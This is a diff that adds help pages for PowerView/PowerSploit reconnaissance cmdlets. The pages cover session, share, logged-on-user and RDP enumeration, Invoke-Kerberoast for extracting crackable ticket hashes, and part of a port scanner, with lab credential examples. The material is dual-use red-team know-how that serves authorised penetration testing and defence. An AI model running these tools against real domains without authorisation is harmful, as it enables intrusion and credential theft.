+Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf
+
+## SYNTAX
+
+```
+Get-NetRDPSession [[-ComputerName] <String[]>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function will execute the WTSEnumerateSessionsEx and WTSQuerySessionInformation
+Win32API calls to query a given RDP remote service for active sessions and originating
+IPs.
+This is a replacement for qwinsta.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-NetRDPSession
+```
+
+Returns active RDP/terminal sessions on the local host.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-NetRDPSession -ComputerName "sqlserver"
+```
+
+Returns active RDP/terminal sessions on the 'sqlserver' host.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainController | Get-NetRDPSession
+```
+
+Returns active RDP/terminal sessions on all domain controllers.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-NetRDPSession -ComputerName sqlserver -Credential $Cred
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the hostname to query for active sessions (also accepts IP addresses).
+Defaults to 'localhost'.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: Localhost
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the remote system using Invoke-UserImpersonation.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.RDPSessionInfo
+
+A PSCustomObject representing a combined WTS_SESSION_INFO_1 and WTS_CLIENT_ADDRESS structure,
+with the ComputerName added.
+
+## NOTES
+
+## RELATED LINKS
+
+[https://msdn.microsoft.com/en-us/library/aa383861(v=vs.85).aspx](https://msdn.microsoft.com/en-us/library/aa383861(v=vs.85).aspx)
+
diff --git a/docs/Recon/Get-NetSession.md b/docs/Recon/Get-NetSession.md
new file mode 100755
index 0000000..d9e2f50
--- /dev/null
+++ b/docs/Recon/Get-NetSession.md
@@ -0,0 +1,99 @@
+# Get-NetSession
+
+## SYNOPSIS
+Returns session information for the local (or a remote) machine.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf
+
+## SYNTAX
+
+```
+Get-NetSession [[-ComputerName] <String[]>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function will execute the NetSessionEnum Win32API call to query
+a given host for active sessions.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-NetSession
+```
+
+Returns active sessions on the local host.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-NetSession -ComputerName sqlserver
+```
+
+Returns active sessions on the 'sqlserver' host.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainController | Get-NetSession
+```
+
+Returns active sessions on all domain controllers.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-NetSession -ComputerName sqlserver -Credential $Cred
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the hostname to query for sessions (also accepts IP addresses).
+Defaults to 'localhost'.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: Localhost
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the remote system using Invoke-UserImpersonation.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.SessionInfo
+
+A PSCustomObject representing a WKSTA_USER_INFO_1 structure, including
+the CName/UserName/Time/IdleTime for each session, with the ComputerName added.
+
+## NOTES
+
+## RELATED LINKS
+
+[http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/](http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/)
+
diff --git a/docs/Recon/Get-NetShare.md b/docs/Recon/Get-NetShare.md
new file mode 100755
index 0000000..b3f2abe
--- /dev/null
+++ b/docs/Recon/Get-NetShare.md
@@ -0,0 +1,100 @@
+# Get-NetShare
+
+## SYNOPSIS
+Returns open shares on the local (or a remote) machine.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf
+
+## SYNTAX
+
+```
+Get-NetShare [[-ComputerName] <String[]>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function will execute the NetShareEnum Win32API call to query
+a given host for open shares.
+This is a replacement for "net share \\\\hostname".
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-NetShare
+```
+
+Returns active shares on the local host.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-NetShare -ComputerName sqlserver
+```
+
+Returns active shares on the 'sqlserver' host
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainComputer | Get-NetShare
+```
+
+Returns all shares for all computers in the domain.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-NetShare -ComputerName sqlserver -Credential $Cred
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the hostname to query for shares (also accepts IP addresses).
+Defaults to 'localhost'.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: Localhost
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the remote system using Invoke-UserImpersonation.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.ShareInfo
+
+A PSCustomObject representing a SHARE_INFO_1 structure, including
+the name/type/remark for each share, with the ComputerName added.
+
+## NOTES
+
+## RELATED LINKS
+
+[http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/](http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/)
+
diff --git a/docs/Recon/Get-PathAcl.md b/docs/Recon/Get-PathAcl.md
new file mode 100755
index 0000000..448212f
--- /dev/null
+++ b/docs/Recon/Get-PathAcl.md
@@ -0,0 +1,94 @@
+# Get-PathAcl
+
+## SYNOPSIS
+Enumerates the ACL for a given file path.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection, ConvertFrom-SID
+
+## SYNTAX
+
+```
+Get-PathAcl [-Path] <String[]> [[-Credential] <PSCredential>]
+```
+
+## DESCRIPTION
+Enumerates the ACL for a specified file/folder path, and translates
+the access rules for each entry into readable formats.
+If -Credential is passed,
+Add-RemoteConnection/Remove-RemoteConnection is used to temporarily map the remote share.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-PathAcl "\\SERVER\Share\"
+```
+
+Returns ACLs for the given UNC share.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+gci .\test.txt | Get-PathAcl
+```
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword)
+Get-PathAcl -Path "\\\\SERVER\Share\" -Credential $Cred
+
+## PARAMETERS
+
+### -Path
+Specifies the local or remote path to enumerate the ACLs for.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: FullName
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target path.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 2
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+### String
+
+One of more paths to enumerate ACLs for.
+
+## OUTPUTS
+
+### PowerView.FileACL
+
+A custom object with the full path and associated ACL entries.
+
+## NOTES
+
+## RELATED LINKS
+
+[https://support.microsoft.com/en-us/kb/305144](https://support.microsoft.com/en-us/kb/305144)
+
diff --git a/docs/Recon/Get-RegLoggedOn.md b/docs/Recon/Get-RegLoggedOn.md
new file mode 100755
index 0000000..2fd6e09
--- /dev/null
+++ b/docs/Recon/Get-RegLoggedOn.md
@@ -0,0 +1,89 @@
+# Get-RegLoggedOn
+
+## SYNOPSIS
+Returns who is logged onto the local (or a remote) machine
+through enumeration of remote registry keys.
+
+Note: This function requires only domain user rights on the
+machine you're enumerating, but remote registry must be enabled.
+
+Author: Matt Kelly (@BreakersAll)
+License: BSD 3-Clause
+Required Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf, ConvertFrom-SID
+
+## SYNTAX
+
+```
+Get-RegLoggedOn [[-ComputerName] <String[]>]
+```
+
+## DESCRIPTION
+This function will query the HKU registry values to retrieve the local
+logged on users SID and then attempt and reverse it.
+Adapted technique from Sysinternal's PSLoggedOn script.
+Benefit over
+using the NetWkstaUserEnum API (Get-NetLoggedon) of less user privileges
+required (NetWkstaUserEnum requires remote admin access).
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-RegLoggedOn
+```
+
+Returns users actively logged onto the local host.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-RegLoggedOn -ComputerName sqlserver
+```
+
+Returns users actively logged onto the 'sqlserver' host.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainController | Get-RegLoggedOn
+```
+
+Returns users actively logged on all domain controllers.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-RegLoggedOn -ComputerName sqlserver -Credential $Cred
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the hostname to query for remote registry values (also accepts IP addresses).
+Defaults to 'localhost'.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: Localhost
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.RegLoggedOnUser
+
+A PSCustomObject including the UserDomain/UserName/UserSID of each
+actively logged on user, with the ComputerName added.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-WMIProcess.md b/docs/Recon/Get-WMIProcess.md
new file mode 100755
index 0000000..481dbb6
--- /dev/null
+++ b/docs/Recon/Get-WMIProcess.md
@@ -0,0 +1,80 @@
+# Get-WMIProcess
+
+## SYNOPSIS
+Returns a list of processes and their owners on the local or remote machine.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+Get-WMIProcess [[-ComputerName] <String[]>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Uses Get-WMIObject to enumerate all Win32_process instances on the local or remote machine,
+including the owners of the particular process.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-WMIProcess -ComputerName WINDOWS1
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-WMIProcess -ComputerName PRIMARY.testlab.local -Credential $Cred
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the hostname to query for cached RDP connections (also accepts IP addresses).
+Defaults to 'localhost'.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: Localhost
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the remote system.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.UserProcess
+
+A PSCustomObject containing the remote process information.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-WMIRegCachedRDPConnection.md b/docs/Recon/Get-WMIRegCachedRDPConnection.md
new file mode 100755
index 0000000..fe60228
--- /dev/null
+++ b/docs/Recon/Get-WMIRegCachedRDPConnection.md
@@ -0,0 +1,99 @@
+# Get-WMIRegCachedRDPConnection
+
+## SYNOPSIS
+Returns information about RDP connections outgoing from the local (or remote) machine.
+
+Note: This function requires administrative rights on the machine you're enumerating.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: ConvertFrom-SID
+
+## SYNTAX
+
+```
+Get-WMIRegCachedRDPConnection [[-ComputerName] <String[]>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Uses remote registry functionality to query all entries for the
+"Windows Remote Desktop Connection Client" on a machine, separated by
+user and target server.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-WMIRegCachedRDPConnection
+```
+
+Returns the RDP connection client information for the local machine.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-WMIRegCachedRDPConnection -ComputerName WINDOWS2.testlab.local
+```
+
+Returns the RDP connection client information for the WINDOWS2.testlab.local machine
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainComputer | Get-WMIRegCachedRDPConnection
+```
+
+Returns cached RDP information for all machines in the domain.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-WMIRegCachedRDPConnection -ComputerName PRIMARY.testlab.local -Credential $Cred
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the hostname to query for cached RDP connections (also accepts IP addresses).
+Defaults to 'localhost'.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: Localhost
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connecting to the remote system.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.CachedRDPConnection
+
+A PSCustomObject containing the ComputerName and cached RDP information.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-WMIRegLastLoggedOn.md b/docs/Recon/Get-WMIRegLastLoggedOn.md
new file mode 100755
index 0000000..bed39e0
--- /dev/null
+++ b/docs/Recon/Get-WMIRegLastLoggedOn.md
@@ -0,0 +1,98 @@
+# Get-WMIRegLastLoggedOn
+
+## SYNOPSIS
+Returns the last user who logged onto the local (or a remote) machine.
+
+Note: This function requires administrative rights on the machine you're enumerating.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+Get-WMIRegLastLoggedOn [[-ComputerName] <String[]>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function uses remote registry to enumerate the LastLoggedOnUser registry key
+for the local (or remote) machine.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-WMIRegLastLoggedOn
+```
+
+Returns the last user logged onto the local machine.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-WMIRegLastLoggedOn -ComputerName WINDOWS1
+```
+
+Returns the last user logged onto WINDOWS1
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainComputer | Get-WMIRegLastLoggedOn
+```
+
+Returns the last user logged onto all machines in the domain.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-WMIRegLastLoggedOn -ComputerName PRIMARY.testlab.local -Credential $Cred
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the hostname to query for remote registry values (also accepts IP addresses).
+Defaults to 'localhost'.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: Localhost
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connecting to the remote system.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.LastLoggedOnUser
+
+A PSCustomObject containing the ComputerName and last loggedon user.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-WMIRegMountedDrive.md b/docs/Recon/Get-WMIRegMountedDrive.md
new file mode 100755
index 0000000..353bcf0
--- /dev/null
+++ b/docs/Recon/Get-WMIRegMountedDrive.md
@@ -0,0 +1,97 @@
+# Get-WMIRegMountedDrive
+
+## SYNOPSIS
+Returns information about saved network mounted drives for the local (or remote) machine.
+
+Note: This function requires administrative rights on the machine you're enumerating.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: ConvertFrom-SID
+
+## SYNTAX
+
+```
+Get-WMIRegMountedDrive [[-ComputerName] <String[]>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Uses remote registry functionality to enumerate recently mounted network drives.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-WMIRegMountedDrive
+```
+
+Returns the saved network mounted drives for the local machine.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-WMIRegMountedDrive -ComputerName WINDOWS2.testlab.local
+```
+
+Returns the saved network mounted drives for the WINDOWS2.testlab.local machine
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainComputer | Get-WMIRegMountedDrive
+```
+
+Returns the saved network mounted drives for all machines in the domain.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-WMIRegMountedDrive -ComputerName PRIMARY.testlab.local -Credential $Cred
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the hostname to query for mounted drive information (also accepts IP addresses).
+Defaults to 'localhost'.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: Localhost
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connecting to the remote system.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.RegMountedDrive
+
+A PSCustomObject containing the ComputerName and mounted drive information.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-WMIRegProxy.md b/docs/Recon/Get-WMIRegProxy.md
new file mode 100755
index 0000000..b5fe966
--- /dev/null
+++ b/docs/Recon/Get-WMIRegProxy.md
@@ -0,0 +1,93 @@
+# Get-WMIRegProxy
+
+## SYNOPSIS
+Enumerates the proxy server and WPAD conents for the current user.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+Get-WMIRegProxy [[-ComputerName] <String[]>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Enumerates the proxy server and WPAD specification for the current user
+on the local machine (default), or a machine specified with -ComputerName.
+It does this by enumerating settings from
+HKU:SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-WMIRegProxy
+```
+
+ComputerName ProxyServer AutoConfigURL Wpad
+------------ ----------- ------------- ----
+WINDOWS1 http://primary.test...
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$Cred = Get-Credential "TESTLAB\administrator"
+```
+
+Get-WMIRegProxy -Credential $Cred -ComputerName primary.testlab.local
+
+ComputerName ProxyServer AutoConfigURL Wpad
+------------ ----------- ------------- ----
+windows1.testlab.local primary.testlab.local
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the system to enumerate proxy settings on.
+Defaults to the local host.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: $Env:COMPUTERNAME
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connecting to the remote system.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+### String
+
+Accepts one or more computer name specification strings on the pipeline (netbios or FQDN).
+
+## OUTPUTS
+
+### PowerView.ProxySettings
+
+Outputs custom PSObjects with the ComputerName, ProxyServer, AutoConfigURL, and WPAD contents.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Invoke-Kerberoast.md b/docs/Recon/Invoke-Kerberoast.md
new file mode 100755
index 0000000..edfb89b
--- /dev/null
+++ b/docs/Recon/Invoke-Kerberoast.md
@@ -0,0 +1,233 @@
+# Invoke-Kerberoast
+
+## SYNOPSIS
+Requests service tickets for kerberoast-able accounts and returns extracted ticket hashes.
+
+Author: Will Schroeder (@harmj0y), @machosec
+License: BSD 3-Clause
+Required Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf, Get-DomainUser, Get-DomainSPNTicket
+
+## SYNTAX
+
+```
+Invoke-Kerberoast [[-Identity] <String[]>] [-Domain <String>] [-LDAPFilter <String>] [-SearchBase <String>]
+ [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone]
+ [-OutputFormat <String>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Uses Get-DomainUser to query for user accounts with non-null service principle
+names (SPNs) and uses Get-SPNTicket to request/extract the crackable ticket information.
+The ticket format can be specified with -OutputFormat \<John/Hashcat\>.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Invoke-Kerberoast | fl
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Invoke-Kerberoast -Domain dev.testlab.local | fl
+```
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -orce
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLB\dfm.a', $SecPassword)
+Invoke-Kerberoast -Credential $Cred -Verbose | fl
+
+## PARAMETERS
+
+### -Identity
+A SamAccountName (e.g.
+harmj0y), DistinguishedName (e.g.
+CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.
+4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).
+Wildcards accepted.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DistinguishedName, SamAccountName, Name, MemberDistinguishedName, MemberName
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -OutputFormat
+Either 'John' for John the Ripper style hash formatting, or 'Hashcat' for Hashcat format.
+Defaults to 'John'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Format
+
+Required: False
+Position: Named
+Default value: John
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.SPNTicket
+
+Outputs a custom object containing the SamAccountName, ServicePrincipalName, and encrypted ticket section.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Invoke-Portscan.md b/docs/Recon/Invoke-Portscan.md
new file mode 100755
index 0000000..49d9e32
--- /dev/null
+++ b/docs/Recon/Invoke-Portscan.md
@@ -0,0 +1,430 @@
+# Invoke-Portscan
+
+## SYNOPSIS
+Simple portscan module
+
+PowerSploit Function: Invoke-Portscan
+Author: Rich Lundeen (http://webstersProdigy.net)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+## SYNTAX
+
+### cmdHosts
+```
+Invoke-Portscan -Hosts <String[]> [-ExcludeHosts <String>] [-Ports <String>] [-PortFile <String>]
+ [-TopPorts <String>] [-ExcludedPorts <String>] [-SkipDiscovery] [-PingOnly] [-DiscoveryPorts <String>]
+ [-Threads <Int32>] [-nHosts <Int32>] [-Timeout <Int32>] [-SleepTimer <Int32>] [-SyncFreq <Int32>] [-T <Int32>]
+ [-GrepOut <String>] [-XmlOut <String>] [-ReadableOut <String>] [-AllformatsOut <String>] [-noProgressMeter]
+ [-quiet] [-ForceOverwrite]
+```
+
+### fHosts
+```
+Invoke-Portscan -HostFile <String> [-ExcludeHosts <String>] [-Ports <String>] [-PortFile <String>]
+ [-TopPorts <String>] [-ExcludedPorts <String>] [-SkipDiscovery] [-PingOnly] [-DiscoveryPorts <String>]
